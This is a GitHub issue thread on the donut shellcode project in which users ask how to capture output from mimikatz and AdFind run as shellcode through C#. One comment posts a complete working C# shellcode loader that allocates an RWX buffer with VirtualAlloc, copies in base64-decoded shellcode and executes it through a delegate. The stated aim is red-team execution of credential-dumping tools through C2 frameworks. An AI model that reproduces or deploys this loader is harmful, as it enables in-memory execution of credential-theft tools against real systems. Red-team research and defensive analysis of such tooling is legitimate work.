### ISSUE TITLE
Question / enhancement : retrieving the output of the donut shellcode in C#

### ISSUE THREAD

**Issue by CeasarSalad** [TheWover/donut#53]
Hey, I really would welcome your help, pointers perhaps implementing a feature in your project that allows to retrieve the output of the donut shellcode when ran through C#. I have seen DonutTest project and it works wonders when executing the shellcode but I am wondering how to get the output of for eg. mimikatz just like you do with the loader instance. I am looking to built / implement something that Phra did in this case: 

![image](https://user-images.githubusercontent.com/50614334/79399151-7e4dff80-7f7a-11ea-8ab0-f6b263bc8c1b.png)

How something like that can be accomplished in C# ?

Many thanks in advance as well as your efforts you put into this project.

**Comment by odzhan** [comment]
Do you mean redirecting output from mimikatz to a file?

**Comment by odzhan** [comment]
Will examine option to redirect standard output of process to file...or possibly remote process over TCP/IP.

**Comment by hackabean** [comment]
Hey @odzhan 

Many thanks for quick reply and to RastaMouse for pointing me in the right direction. I have found my solution yesterday I wanted to share. Here is C# code snipped that allows me to do just that:

```
using System;
using System.Runtime.InteropServices;

namespace Wrapper
{
    class Program
    {
        [Flags]
        public enum AllocationType : uint
        {
            COMMIT = 0x1000,
            RESERVE = 0x2000,
            RESET = 0x80000,
            LARGE_PAGES = 0x20000000,
            PHYSICAL = 0x400000,
            TOP_DOWN = 0x100000,
            WRITE_WATCH = 0x200000
        }

        [Flags]
        public enum MemoryProtection : uint
        {
            EXECUTE = 0x10,
            EXECUTE_READ = 0x20,
            EXECUTE_READWRITE = 0x40,
            EXECUTE_WRITECOPY = 0x80,
            NOACCESS = 0x01,
            READONLY = 0x02,
            READWRITE = 0x04,
            WRITECOPY = 0x08,
            GUARD_Modifierflag = 0x100,
            NOCACHE_Modifierflag = 0x200,
            WRITECOMBINE_Modifierflag = 0x400
        }

        public enum FreeType : uint
        {
            MEM_DECOMMIT = 0x4000,
            MEM_RELEASE = 0x8000
        }

        [DllImport("kernel32.dll", SetLastError = true)]
        static extern IntPtr VirtualAlloc(IntPtr lpAddress, UIntPtr dwSize, AllocationType flAllocationType, MemoryProtection flProtect);

        [DllImport("kernel32.dll")]
        public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

        [DllImport("kernel32")]
        private static extern bool VirtualFree(IntPtr lpAddress, UInt32 dwSize, FreeType dwFreeType);

        [UnmanagedFunctionPointerAttribute(CallingConvention.Cdecl)]
        public delegate Int32 ExecuteDelegate();
   

        static void Main()
        {
                // Create base64 encoded shellcode
    	    string s = "BASE64HERE";
            
                // Covert base64 shellcode to byte array
            byte[] sc = Convert.FromBase64String(s);

		    IntPtr baseAddr = VirtualAlloc(IntPtr.Zero, (UIntPtr)(sc.Length + 1), AllocationType.RESERVE | AllocationType.COMMIT, MemoryProtection.EXECUTE_READWRITE);

                // Copy shellcode to RWX buffer
            Marshal.Copy(sc, 0, baseAddr, sc.Length);

                // Get pointer to function created in memory
            ExecuteDelegate del = (ExecuteDelegate)Marshal.GetDelegateForFunctionPointer(baseAddr, typeof(ExecuteDelegate));

            del();

            VirtualFree(baseAddr, 0, FreeType.MEM_RELEASE);
            }
        }
    }
```

You just generate raw shellcode with donut, base64 encode it and paste it above. This way allows me to retrieve output from she running shellcode.

**Comment by hackabean** [comment]
@odzhan 

The reason why I asked if this feature can be implemented as your project is unique in the sense that it can run unmanaged projects via shellcode eg. mimikatz.  This opens new door to Red Team capabilities as most C2 frameworks are moving into some kind of execute-assembly option to run C# instead of relying on powershell as it used to be in the past. 

There are many great projects that Red Team operators would benefit from but some of them, like AdFind.exe by JoeWare are written in C++ (although I am sure there are others) .

Donut shellcode seem to be a prime candidate to bridge the gap between C# and C++ if only we could retrieve the output.

I have tried running AdFind.exe converted to Donut shellcode using the code above but for some reason I got no output. At the moment the answer to this problem is beyond my capabilities. It would be hugely beneficial to others to see how this problem can be solved.

Thanks for your consideration.
